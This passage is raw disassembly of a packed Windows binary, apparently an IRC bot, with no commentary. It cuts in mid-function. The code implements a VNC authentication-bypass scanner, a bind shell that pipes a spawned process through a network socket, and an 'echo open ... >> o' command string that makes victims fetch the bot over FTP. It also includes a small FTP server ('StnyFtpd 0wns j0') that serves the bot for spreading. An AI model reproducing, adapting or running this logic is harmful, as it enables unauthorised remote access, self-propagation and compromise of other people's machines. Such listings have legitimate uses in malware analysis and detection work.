dword ptr 0Ch push esi push edi mov edi, [esp+8+arg_8] xor esi, esi loc_40E195: ; CODE XREF: sub_40E18D+2Dj test edi, edi jle short loc_40E1C0 mov eax, [esp+8+arg_4] push 0 add eax, esi push edi push eax push [esp+14h+arg_0] call ds:dword_4CB66C ; recv test eax, eax jz short loc_40E1BC cmp eax, 0FFFFFFFFh jz short loc_40E1BC sub edi, eax add esi, eax jmp short loc_40E195 ; --------------------------------------------------------------------------- loc_40E1BC: ; CODE XREF: sub_40E18D+22j ; sub_40E18D+27j xor eax, eax jmp short loc_40E1C3 ; --------------------------------------------------------------------------- loc_40E1C0: ; CODE XREF: sub_40E18D+Aj push 1 pop eax loc_40E1C3: ; CODE XREF: sub_40E18D+31j pop edi pop esi retn sub_40E18D endp ; =============== S U B R O U T I N E ======================================= sub_40E1C6 proc near ; CODE XREF: UPX0:0040E2C7p ; UPX0:0040E2F4p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push esi push edi mov edi, [esp+8+arg_8] test edi, edi jz short loc_40E203 xor esi, esi test edi, edi jle short loc_40E1FD loc_40E1D6: ; CODE XREF: sub_40E1C6+35j mov eax, edi push 0 sub eax, esi push eax mov eax, [esp+10h+arg_4] add eax, esi push eax push [esp+14h+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jz short loc_40E203 test eax, eax jz short loc_40E203 add esi, eax cmp esi, edi jl short loc_40E1D6 loc_40E1FD: ; CODE XREF: sub_40E1C6+Ej push 1 pop eax loc_40E200: ; CODE XREF: sub_40E1C6+3Fj pop edi pop esi retn ; --------------------------------------------------------------------------- loc_40E203: ; CODE XREF: sub_40E1C6+8j ; sub_40E1C6+2Bj ... xor eax, eax jmp short loc_40E200 sub_40E1C6 endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 24Ch push ebx mov ax, word_433C00 push esi push edi push 0 push 1 push 2 mov [ebp-2], ax pop esi push esi call ds:dword_4CB6D4 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jnz short loc_40E235 push eax jmp short loc_40E269 ; --------------------------------------------------------------------------- loc_40E235: ; CODE XREF: UPX0:0040E230j lea eax, [ebp+0Ch] push eax call ds:dword_4CB694 ; inet_addr push dword ptr [ebp+0A8h] mov [ebp-48h], eax mov [ebp-4Ch], si call ds:dword_4CB654 ; htons mov [ebp-4Ah], ax lea eax, [ebp-4Ch] push 10h push eax push ebx call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jnz short loc_40E274 push ebx loc_40E269: ; CODE XREF: UPX0:0040E233j call ds:dword_4CB6EC ; closesocket jmp loc_40E46F ; --------------------------------------------------------------------------- loc_40E274: ; CODE XREF: UPX0:0040E266j lea eax, [ebp-38h] push 0Ch push eax push ebx call sub_40E18D add esp, 0Ch test eax, eax jz loc_40E468 lea eax, [ebp-20h] and byte ptr [ebp-2Ch], 0 push eax lea eax, [ebp-28h] push eax lea eax, [ebp-38h] push offset aRfb03d_03d ; "RFB %03d.%03d\n" push eax call sub_41C645 add esp, 10h cmp eax, esi jnz loc_40E468 cmp dword ptr [ebp-28h], 3 jz short loc_40E2C0 cmp dword ptr [ebp-20h], 8 jnz loc_40E468 loc_40E2C0: ; CODE XREF: UPX0:0040E2B4j lea eax, [ebp-38h] push 0Ch push eax push ebx call sub_40E1C6 add esp, 0Ch test eax, eax jz loc_40E468 lea eax, [ebp-3Ch] push esi push eax push ebx call sub_40E18D add esp, 0Ch test eax, eax jz loc_40E468 lea eax, [ebp-2] push 1 push eax push ebx call sub_40E1C6 add esp, 0Ch test eax, eax jz loc_40E468 lea eax, [ebp-24h] push 4 push eax push ebx call sub_40E18D add esp, 0Ch test eax, eax jz loc_40E468 mov eax, [ebp-24h] mov edi, 0FF0000h mov ecx, eax mov edx, eax and ecx, edi mov esi, 0FF00h shr edx, 10h or ecx, edx mov edx, eax shl edx, 10h and eax, esi or edx, eax shr ecx, 8 shl edx, 8 or ecx, edx mov [ebp-24h], ecx jnz loc_40E468 push 1 push offset dword_4CB50C push ebx call sub_40E1C6 add esp, 0Ch test eax, eax jz loc_40E468 lea eax, [ebp-1Ch] push 18h push eax push ebx call sub_40E18D add esp, 0Ch test eax, eax jz loc_40E468 xor eax, eax mov ecx, [ebp-8] mov al, [ebp-1Bh] mov edx, ecx mov ah, [ebp-1Ch] mov [ebp-1Ch], ax xor eax, eax mov al, [ebp-19h] mov ah, [ebp-1Ah] mov [ebp-1Ah], ax xor eax, eax mov al, [ebp-13h] mov ah, [ebp-14h] mov [ebp-14h], ax xor eax, eax mov al, [ebp-11h] mov ah, [ebp-12h] mov [ebp-12h], ax xor eax, eax mov al, [ebp-0Fh] mov ah, [ebp-10h] mov [ebp-10h], ax mov eax, ecx and eax, edi shr edx, 10h or eax, edx mov edx, ecx shl edx, 10h and ecx, esi or edx, ecx shr eax, 8 shl edx, 8 or eax, edx mov [ebp-8], eax add eax, 2 push eax call sub_41CFC5 mov edi, [ebp-8] pop ecx test edi, edi mov esi, eax jle short loc_40E3F8 push edi push esi push ebx call sub_40E18D add esp, 0Ch loc_40E3F8: ; CODE XREF: UPX0:0040E3EBj and byte ptr [edi+esi], 0 lea eax, [ebp+0Ch] push eax push esi push dword ptr [ebp-20h] lea eax, [ebp-24Ch] push dword ptr [ebp-28h] push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]" push 200h push eax call sub_41B980 push 0 lea eax, [ebp-24Ch] push dword ptr [ebp+0B8h] push eax lea eax, [ebp+1Ch] push eax push dword ptr [ebp+8] call sub_409A73 lea eax, [ebp-24Ch] push eax call sub_4151AD mov eax, [ebp+0B0h] add esp, 34h shl eax, 6 inc dword_431B08[eax] push ebx lea eax, dword_431B08[eax] call dword_42721C ; closesocket push 1 pop eax jmp short loc_40E471 ; --------------------------------------------------------------------------- loc_40E468: ; CODE XREF: UPX0:0040E285j ; UPX0:0040E2AAj ... push ebx call dword_42721C ; closesocket loc_40E46F: ; CODE XREF: UPX0:0040E26Fj xor eax, eax loc_40E471: ; CODE XREF: UPX0:0040E466j pop edi pop esi pop ebx leave retn ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn bp-based frame sub_40E476 proc near ; DATA XREF: sub_40E504+15Bo var_404 = byte ptr -404h var_4 = byte ptr -4 push ebp mov ebp, esp sub esp, 404h loc_40E47F: ; CODE XREF: sub_40E476+25j ; sub_40E476+41j push 0 lea eax, [ebp+var_404] push 400h push eax push ds:dword_4CE394 call ds:dword_4CB66C ; recv test eax, eax jle short loc_40E47F lea ecx, [ebp+var_4] push 0 push ecx push eax lea eax, [ebp+var_404] push eax push ds:dword_4CE390 call dword_4270E0 ; WriteFile jmp short loc_40E47F sub_40E476 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn bp-based frame sub_40E4B9 proc near ; DATA XREF: sub_40E504+142o var_404 = byte ptr -404h var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 404h loc_40E4C2: ; CODE XREF: sub_40E4B9+2Fj ; sub_40E4B9+49j lea eax, [ebp+var_4] and [ebp+var_4], 0 push 0 push eax lea eax, [ebp+var_404] push 400h push eax push ds:dword_4CE384 call dword_4270E8 ; ReadFile cmp [ebp+var_4], 0 jle short loc_40E4C2 push 0 lea eax, [ebp+var_404] push [ebp+var_4] push eax push ds:dword_4CE394 call ds:dword_4CB6A4 ; send jmp short loc_40E4C2 sub_40E4B9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn bp-based frame sub_40E504 proc near ; DATA XREF: sub_401ACD+2D0Eo var_11C = byte ptr -11Ch var_98 = dword ptr -98h var_7C = dword ptr -7Ch var_50 = dword ptr -50h var_4C = word ptr -4Ch var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = byte ptr -3Ch var_38 = word ptr -38h var_36 = word ptr -36h var_28 = dword ptr -28h var_24 = dword ptr -24h var_18 = byte ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 11Ch mov eax, [ebp+arg_0] push ebx push esi push edi push 28h mov esi, eax pop ecx lea edi, [ebp+var_11C] rep movsd push 1 xor edi, edi pop esi mov [eax+98h], esi push 10h lea eax, [ebp+var_38] push edi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_38], 2 push [ebp+var_98] call ds:dword_4CB654 ; htons push 6 push esi push 2 mov [ebp+var_36], ax call ds:dword_4CB6D4 ; socket mov [ebp+arg_0], eax lea eax, [ebp+var_38] push 10h push eax push [ebp+arg_0] call ds:dword_4CB680 ; bind push 5 push [ebp+arg_0] call ds:dword_4CB67C ; listen mov ebx, dword_4270FC mov esi, dword_427068 loc_40E584: ; CODE XREF: sub_40E504+1CBj push edi push edi push [ebp+arg_0] call ds:dword_4CB6E8 ; accept mov ds:dword_4CE394, eax lea eax, [ebp+var_C] push edi push eax push offset dword_4CE390 push offset dword_4CE38C mov [ebp+var_C], 0Ch mov [ebp+var_4], 1 mov [ebp+var_8], edi call ebx ; CreatePipe lea eax, [ebp+var_C] push edi push eax push offset dword_4CE388 push offset dword_4CE384 call ebx ; CreatePipe push 44h lea eax, [ebp+var_7C] push edi push eax call sub_41B590 mov eax, ds:dword_4CE38C add esp, 0Ch mov [ebp+var_44], eax mov eax, ds:dword_4CE388 mov [ebp+var_40], eax push edi push 1 lea eax, [ebp+var_3C] push 2 push eax mov [ebp+var_7C], 44h mov [ebp+var_50], 101h mov [ebp+var_4C], di call dword_4270F8 ; GetCurrentProcess push eax push ds:dword_4CE388 call dword_4270F8 ; GetCurrentProcess push eax call dword_4270F4 ; DuplicateHandle lea eax, [ebp+var_28] push eax lea eax, [ebp+var_7C] push eax push edi push edi push 4000090h lea eax, [ebp+var_C] push 1 push eax lea eax, [ebp+var_C] push eax push offset dword_433C04 push edi call dword_42706C ; CreateProcessA lea eax, [ebp+var_18] push eax push edi push edi push offset sub_40E4B9 lea eax, [ebp+var_C] push edi push eax call dword_42707C ; CreateThread mov [ebp+var_14], eax lea eax, [ebp+var_18] push eax push edi push edi push offset sub_40E476 lea eax, [ebp+var_C] push edi push eax call dword_42707C ; CreateThread push 0FFFFFFFFh mov [ebp+var_10], eax push [ebp+var_28] call dword_4270A0 ; WaitForSingleObject push edi push [ebp+var_10] call dword_4270AC ; TerminateThread push edi push [ebp+var_14] call dword_4270AC ; TerminateThread push [ebp+var_10] call esi ; CloseHandle push [ebp+var_14] call esi ; CloseHandle push edi push [ebp+var_28] call dword_4270F0 ; TerminateProcess push ds:dword_4CE38C call esi ; CloseHandle push ds:dword_4CE390 call esi ; CloseHandle push ds:dword_4CE384 call esi ; CloseHandle push ds:dword_4CE388 call esi ; CloseHandle push [ebp+var_24] call esi ; CloseHandle push [ebp+var_28] call esi ; CloseHandle jmp loc_40E584 sub_40E504 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_40E6D4 proc near ; DATA XREF: UPX0:00429010o jmp $+5 sub_40E6D4 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_40E6D9 proc near push 0FFFEh push 400h call sub_418685 pop ecx mov ds:dword_4CE39C, eax pop ecx retn sub_40E6D9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40E6F0 proc near ; DATA XREF: sub_40BACE+34Do var_6C0 = byte ptr -6C0h var_2C0 = byte ptr -2C0h var_C0 = byte ptr -0C0h var_B0 = dword ptr -0B0h var_AC = dword ptr -0ACh var_A4 = dword ptr -0A4h var_A0 = byte ptr -0A0h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 6C0h mov eax, [ebp+arg_0] push ebx push esi push edi push 27h mov esi, eax pop ecx lea edi, [ebp+var_B0] rep movsd push 1 xor ebx, ebx pop esi mov [eax+98h], esi push 10h lea eax, [ebp+var_14] push ebx push eax call sub_41B590 add esp, 0Ch mov [ebp+var_14], 2 push [ebp+var_A4] call ds:dword_4CB654 ; htons push ebx push esi push 2 mov [ebp+var_12], ax mov [ebp+var_10], ebx call ds:dword_4CB6D4 ; socket mov edi, eax or esi, 0FFFFFFFFh cmp edi, esi jnz short loc_40E797 cmp [ebp+var_1C], ebx jnz short loc_40E777 push ebx lea eax, [ebp+var_2C0] push [ebp+var_20] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_B0] call sub_409A73 add esp, 14h loc_40E777: ; CODE XREF: sub_40E6F0+65j lea eax, [ebp+var_2C0] push eax call sub_4151AD push [ebp+var_AC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_40E797: ; CODE XREF: sub_40E6F0+60j mov eax, [ebp+var_AC] push 10h imul eax, 234h mov dword_43E59C[eax], edi lea eax, [ebp+var_14] push eax push edi call ds:dword_4CB680 ; bind cmp eax, esi mov ebx, 400h jnz loc_40E892 call ds:dword_4CB5E8 ; WSAGetLastError cmp eax, 2740h jz short loc_40E817 xor esi, esi cmp [ebp+var_1C], esi jnz short loc_40E7F7 push esi lea eax, [ebp+var_2C0] push [ebp+var_20] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_B0] call sub_409A73 add esp, 14h loc_40E7F7: ; CODE XREF: sub_40E6F0+E5j lea eax, [ebp+var_2C0] push eax call sub_4151AD push [ebp+var_AC] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_40E817: ; CODE XREF: sub_40E6F0+DEj push 0FFFEh push ebx call sub_418685 pop ecx mov ds:dword_4CE39C, eax pop ecx mov [ebp+var_12], ax lea eax, [ebp+var_14] push 10h push eax push edi call ds:dword_4CB680 ; bind cmp eax, esi jnz short loc_40E892 call ds:dword_4CB5E8 ; WSAGetLastError xor esi, esi cmp [ebp+var_1C], esi jnz short loc_40E872 cmp eax, 2740h jz short loc_40E872 push esi lea eax, [ebp+var_2C0] push [ebp+var_20] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_B0] call sub_409A73 add esp, 14h loc_40E872: ; CODE XREF: sub_40E6F0+159j ; sub_40E6F0+160j lea eax, [ebp+var_2C0] push eax call sub_4151AD push [ebp+var_AC] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_40E892: ; CODE XREF: sub_40E6F0+CDj ; sub_40E6F0+14Cj push 5 push edi call ds:dword_4CB67C ; listen cmp eax, esi jz loc_40E977 mov [ebp+var_4], 10h mov esi, offset byte_429110 loc_40E8AF: ; CODE XREF: sub_40E6F0+1D7j ; sub_40E6F0+227j ... lea eax, [ebp+var_4] push eax lea eax, [ebp+var_C0] push eax push edi call ds:dword_4CB6E8 ; accept cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_40E8AF cmp [ebp+var_1C], 0 jnz short loc_40E8F0 push 0 lea eax, [ebp+var_2C0] push [ebp+var_20] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_B0] call sub_409A73 add esp, 14h loc_40E8F0: ; CODE XREF: sub_40E6F0+1DDj lea eax, [ebp+var_2C0] push eax call sub_4151AD pop ecx lea eax, [ebp+var_2C0] push 0 push 200h push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv cmp eax, 0FFFFFFFFh jz short loc_40E8AF push esi push esi push ds:dword_4CB390 push [ebp+var_B0] call sub_40AC10 pop ecx push eax push offset aEchoOpenSDOEch ; "echo open %s %d >> o&echo user 1 >>o &e"... lea eax, [ebp+var_6C0] push ebx push eax call sub_41B980 add esp, 1Ch lea eax, [ebp+var_6C0] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_6C0] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jz loc_40E8AF inc ds:dword_4CE3A4 jmp loc_40E8AF ; --------------------------------------------------------------------------- loc_40E977: ; CODE XREF: sub_40E6F0+1ADj push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_AC] call sub_40B413 pop ecx push 0 call dword_4270CC ; ExitThread sub_40E6F0 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40E992 proc near ; DATA XREF: sub_40BACE+22Ao var_A70 = byte ptr -0A70h var_8E0 = byte ptr -8E0h var_6E0 = dword ptr -6E0h var_4C8 = byte ptr -4C8h var_448 = dword ptr -448h var_444 = dword ptr -444h var_43C = dword ptr -43Ch var_338 = byte ptr -338h var_2D4 = byte ptr -2D4h var_2A0 = byte ptr -2A0h var_23C = byte ptr -23Ch var_22C = dword ptr -22Ch var_228 = dword ptr -228h var_128 = byte ptr -128h var_FC = byte ptr -0FCh var_C8 = byte ptr -0C8h var_B0 = byte ptr -0B0h var_4C = word ptr -4Ch var_4A = word ptr -4Ah var_48 = dword ptr -48h var_3C = byte ptr -3Ch var_2C = dword ptr -2Ch var_28 = byte ptr -28h var_24 = dword ptr -24h var_20 = byte ptr -20h var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_14 = byte ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0A70h mov eax, [ebp+arg_0] push ebx push esi push edi push 1 mov ecx, 0A9h mov esi, eax lea edi, [ebp+var_6E0] pop ebx rep movsd mov [eax+2A0h], ebx lea eax, [ebp+var_A70] xor esi, esi push eax push 101h mov [ebp+var_1C], ebx mov [ebp+var_2C], ebx mov [ebp+var_24], ebx mov [ebp+var_22C], esi mov [ebp+var_43C], esi call dword_4271F0 ; WSAStartup push esi push ebx push 2 call dword_427220 ; socket mov esi, dword_4271F4 lea ecx, [ebp+var_1C] push 4 push ecx mov edi, 0FFFFh push 4 push edi push eax mov [ebp+var_8], eax call esi ; setsockopt lea eax, [ebp+var_2C] push 4 push eax push 0FFFFFFFBh push edi mov edi, [ebp+var_8] push edi call esi ; setsockopt lea eax, [ebp+var_24] push eax push 8004667Eh push edi call dword_4271F8 ; ioctlsocket mov ax, word ptr ds:dword_4CB390 and [ebp+var_48], 0 push eax mov [ebp+var_4C], 2 call ds:dword_4CB654 ; htons mov [ebp+var_4A], ax lea eax, [ebp+var_4C] push 10h push eax push edi call dword_4271FC ; bind test eax, eax jge short loc_40EA58 mov eax, ebx jmp loc_40EFB8 ; --------------------------------------------------------------------------- loc_40EA58: ; CODE XREF: sub_40E992+BDj push 0Ah push edi call dword_427200 ; listen mov [ebp+var_22C], ebx mov ebx, dword_427224 mov [ebp+var_228], edi mov [ebp+var_4], edi loc_40EA76: ; CODE XREF: sub_40E992+11Dj ; sub_40E992+61Ej push 41h lea esi, [ebp+var_22C] pop ecx lea edi, [ebp+var_43C] rep movsd xor esi, esi lea eax, [ebp+var_43C] push esi push esi push esi push eax mov eax, [ebp+var_4] inc eax push eax call dword_427228 ; select cmp eax, 0FFFFFFFFh jz loc_40EFB5 xor edi, edi cmp [ebp+var_4], esi mov [ebp+arg_0], edi jl short loc_40EA76 loc_40EAB1: ; CODE XREF: sub_40E992+618j xor esi, esi push 64h lea eax, [ebp+var_2A0] push esi push eax call sub_41B590 push 64h lea eax, [ebp+var_B0] push esi push eax call sub_41B590 add esp, 18h lea eax, [ebp+var_43C] push eax push edi call sub_426756 ; __WSAFDIsSet test eax, eax jz loc_40EFA3 cmp edi, [ebp+var_8] jnz short loc_40EB68 lea eax, [ebp+var_10] mov [ebp+var_10], 10h push eax lea eax, [ebp+var_23C] push eax push [ebp+var_8] call dword_427204 ; accept cmp eax, 0FFFFFFFFh jz loc_40EFA3 xor ecx, ecx cmp [ebp+var_22C], esi jbe short loc_40EB32 lea edx, [ebp+var_228] loc_40EB22: ; CODE XREF: sub_40E992+19Ej cmp [edx], eax jz short loc_40EB32 inc ecx add edx, 4 cmp ecx, [ebp+var_22C] jb short loc_40EB22 loc_40EB32: ; CODE XREF: sub_40E992+188j ; sub_40E992+192j cmp ecx, [ebp+var_22C] jnz short loc_40EB50 cmp [ebp+var_22C], 40h jnb short loc_40EB50 mov [ebp+ecx*4+var_228], eax inc [ebp+var_22C] loc_40EB50: ; CODE XREF: sub_40E992+1A6j ; sub_40E992+1AFj cmp eax, [ebp+var_4] jle short loc_40EB58 mov [ebp+var_4], eax loc_40EB58: ; CODE XREF: sub_40E992+1C1j push esi push 15h push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n" push eax call ebx ; send jmp loc_40EFA3 ; --------------------------------------------------------------------------- loc_40EB68: ; CODE XREF: sub_40E992+15Aj push esi lea eax, [ebp+var_2A0] push 64h push eax push edi call dword_427218 ; recv test eax, eax jg short loc_40EBCF mov edx, [ebp+var_22C] xor ecx, ecx cmp edx, esi jbe short loc_40EBC3 lea eax, [ebp+var_228] loc_40EB8F: ; CODE XREF: sub_40E992+207j cmp [eax], edi jz short loc_40EB9D inc ecx add eax, 4 cmp ecx, edx jb short loc_40EB8F jmp short loc_40EBC3 ; --------------------------------------------------------------------------- loc_40EB9D: ; CODE XREF: sub_40E992+1FFj dec edx cmp ecx, edx jnb short loc_40EBBD lea eax, [ebp+ecx*4+var_228] loc_40EBA9: ; CODE XREF: sub_40E992+229j mov edx, [eax+4] inc ecx mov [eax], edx mov edx, [ebp+var_22C] add eax, 4 dec edx cmp ecx, edx jb short loc_40EBA9 loc_40EBBD: ; CODE XREF: sub_40E992+20Ej dec [ebp+var_22C] loc_40EBC3: ; CODE XREF: sub_40E992+1F5j ; sub_40E992+209j push edi call dword_42721C ; closesocket jmp loc_40EFA3 ; --------------------------------------------------------------------------- loc_40EBCF: ; CODE XREF: sub_40E992+1E9j lea eax, [ebp+var_338] push eax lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_2A0] push offset aSS_0 ; "%s %s" push eax call sub_41C645 lea eax, [ebp+var_B0] push offset aUser_1 ; "USER" push eax call sub_41C070 add esp, 18h test eax, eax jnz short loc_40EC13 push esi push 16h push offset a331PasswordReq ; "331 Password required\n" jmp loc_40EC95 ; --------------------------------------------------------------------------- loc_40EC13: ; CODE XREF: sub_40E992+272j lea eax, [ebp+var_B0] push offset aPass ; "PASS" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40EC34 push esi push 14h push offset a230UserLoggedI ; "230 User logged in.\n" jmp short loc_40EC95 ; --------------------------------------------------------------------------- loc_40EC34: ; CODE XREF: sub_40E992+296j lea eax, [ebp+var_B0] push offset aSyst ; "SYST" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40EC55 push esi push 0Dh push offset a215Stnyftpd ; "215 StnyFtpd\n" jmp short loc_40EC95 ; --------------------------------------------------------------------------- loc_40EC55: ; CODE XREF: sub_40E992+2B7j lea eax, [ebp+var_B0] push offset aRest ; "REST" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40EC76 push esi push 10h push offset a350Restarting_ ; "350 Restarting.\n" jmp short loc_40EC95 ; --------------------------------------------------------------------------- loc_40EC76: ; CODE XREF: sub_40E992+2D8j lea eax, [ebp+var_B0] push offset off_433E54 push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40EC9B push esi push 1Eh push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n" loc_40EC95: ; CODE XREF: sub_40E992+27Cj ; sub_40E992+2A0j ... push edi jmp loc_40EF8C ; --------------------------------------------------------------------------- loc_40EC9B: ; CODE XREF: sub_40E992+2F9j mov edi, offset aType ; "TYPE" lea eax, [ebp+var_B0] push edi push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ECD7 lea eax, [ebp+var_338] push offset aA_0 ; "A" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ECD7 push esi push 13h push offset a200TypeSetToA_ ; "200 Type set to A.\n" jmp loc_40EF89 ; --------------------------------------------------------------------------- loc_40ECD7: ; CODE XREF: sub_40E992+31Fj ; sub_40E992+336j lea eax, [ebp+var_B0] push edi push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ED0E lea eax, [ebp+var_338] push offset aI_0 ; "I" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ED0E push esi push 13h push offset a200TypeSetToI_ ; "200 Type set to I.\n" jmp loc_40EF89 ; --------------------------------------------------------------------------- loc_40ED0E: ; CODE XREF: sub_40E992+356j ; sub_40E992+36Dj lea eax, [ebp+var_B0] push offset aPasv ; "PASV" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ED59 push 0Ah mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"... pop ecx lea edi, [ebp+var_128] rep movsd push eax lea eax, [ebp+var_128] push eax movsw call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_128] loc_40ED4C: ; CODE XREF: sub_40E992+406j push eax push [ebp+arg_0] call ebx ; send xor esi, esi jmp loc_40EF8E ; --------------------------------------------------------------------------- loc_40ED59: ; CODE XREF: sub_40E992+391j lea eax, [ebp+var_B0] push offset aList_0 ; "LIST" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40ED9A push 5 mov esi, offset a226TransferCom ; "226 Transfer complete\n" pop ecx lea edi, [ebp+var_C8] rep movsd movsw push eax lea eax, [ebp+var_C8] push eax movsb call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_C8] jmp short loc_40ED4C ; --------------------------------------------------------------------------- loc_40ED9A: ; CODE XREF: sub_40E992+3DCj lea eax, [ebp+var_B0] push offset aPort ; "PORT" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40EE6B lea eax, [ebp+var_2D4] push eax lea eax, [ebp+var_FC] push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_18] push eax lea eax, [ebp+var_20] push eax lea eax, [ebp+var_28] push eax lea eax, [ebp+var_2A0] push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"... push eax call sub_41C645 lea eax, [ebp+var_FC] push eax call sub_41B779 mov edi, eax lea eax, [ebp+var_2D4] push eax call sub_41B779 mov [ebp+var_C], eax push 32h lea eax, [ebp+var_FC] push esi push eax call sub_41B590 add esp, 34h lea eax, [ebp+var_FC] push [ebp+var_C] push edi push offset aXX ; "%x%x\n" push eax call sub_41B886 push 10h lea eax, [ebp+var_FC] push esi push eax call sub_41BDC5 add esp, 1Ch mov [ebp+var_C], eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_18] push eax lea eax, [ebp+var_20] push eax lea eax, [ebp+var_28] push eax lea eax, [ebp+var_3C] push offset aS_S_S_S ; "%s.%s.%s.%s" push eax call sub_41B886 add esp, 18h push esi push 1Dh push offset a200PortCommand ; "200 PORT command successful.\n" jmp loc_40EF89 ; --------------------------------------------------------------------------- loc_40EE6B: ; CODE XREF: sub_40E992+41Dj lea eax, [ebp+var_B0] push offset aRetr ; "RETR" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40EF6A push esi push 28h push offset a150OpeningBina ; "150 Opening BINARY mode data connection"... push [ebp+arg_0] call ebx ; send push [ebp+var_C] lea eax, [ebp+var_3C] push eax call sub_40EFBF pop ecx cmp eax, 1 pop ecx jnz loc_40EF60 lea eax, [ebp+var_3C] push eax lea eax, [ebp+var_8E0] push offset aFtpTransferSta ; "ftp transfer started to: %s" push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_444], esi jnz short loc_40EEED push esi lea eax, [ebp+var_8E0] push [ebp+var_448] push eax lea eax, [ebp+var_4C8] push eax push [ebp+var_6E0] call sub_409A73 add esp, 14h loc_40EEED: ; CODE XREF: sub_40E992+536j call sub_40F03C cmp eax, 1 jnz loc_40EF8E push esi push 17h push offset a226TransferC_0 ; "226 Transfer complete.\n" push [ebp+arg_0] call ebx ; send lea eax, [ebp+var_3C] push eax lea eax, [ebp+var_8E0] push offset aFtpTransferCom ; "ftp transfer complete to: %s" push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_444], esi jnz short loc_40EF4B push esi lea eax, [ebp+var_8E0] push [ebp+var_448] push eax lea eax, [ebp+var_4C8] push eax push [ebp+var_6E0] call sub_409A73 add esp, 14h loc_40EF4B: ; CODE XREF: sub_40E992+594j lea eax, [ebp+var_8E0] push eax call sub_4151AD inc ds:dword_4CE160 pop ecx jmp short loc_40EF8E ; --------------------------------------------------------------------------- loc_40EF60: ; CODE XREF: sub_40E992+512j push esi push 20h push offset a425CanTOpenDat ; "425 Can't open data connection.\n" jmp short loc_40EF89 ; --------------------------------------------------------------------------- loc_40EF6A: ; CODE XREF: sub_40E992+4EEj lea eax, [ebp+var_B0] push offset aQuit ; "QUIT" push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40EF8E push esi push 1Bh push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n" loc_40EF89: ; CODE XREF: sub_40E992+340j ; sub_40E992+377j ... push [ebp+arg_0] loc_40EF8C: ; CODE XREF: sub_40E992+304j call ebx ; send loc_40EF8E: ; CODE XREF: sub_40E992+3C2j ; sub_40E992+563j ... push 64h lea eax, [ebp+var_2A0] push esi push eax call sub_41B590 mov edi, [ebp+arg_0] add esp, 0Ch loc_40EFA3: ; CODE XREF: sub_40E992+151j ; sub_40E992+17Aj ... inc edi cmp edi, [ebp+var_4] mov [ebp+arg_0], edi jle loc_40EAB1 jmp loc_40EA76 ; --------------------------------------------------------------------------- loc_40EFB5: ; CODE XREF: sub_40E992+10Fj push 1 pop eax loc_40EFB8: ; CODE XREF: sub_40E992+C1j pop edi pop esi pop ebx leave retn 4 sub_40E992 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40EFBF proc near ; CODE XREF: sub_40E992+508p 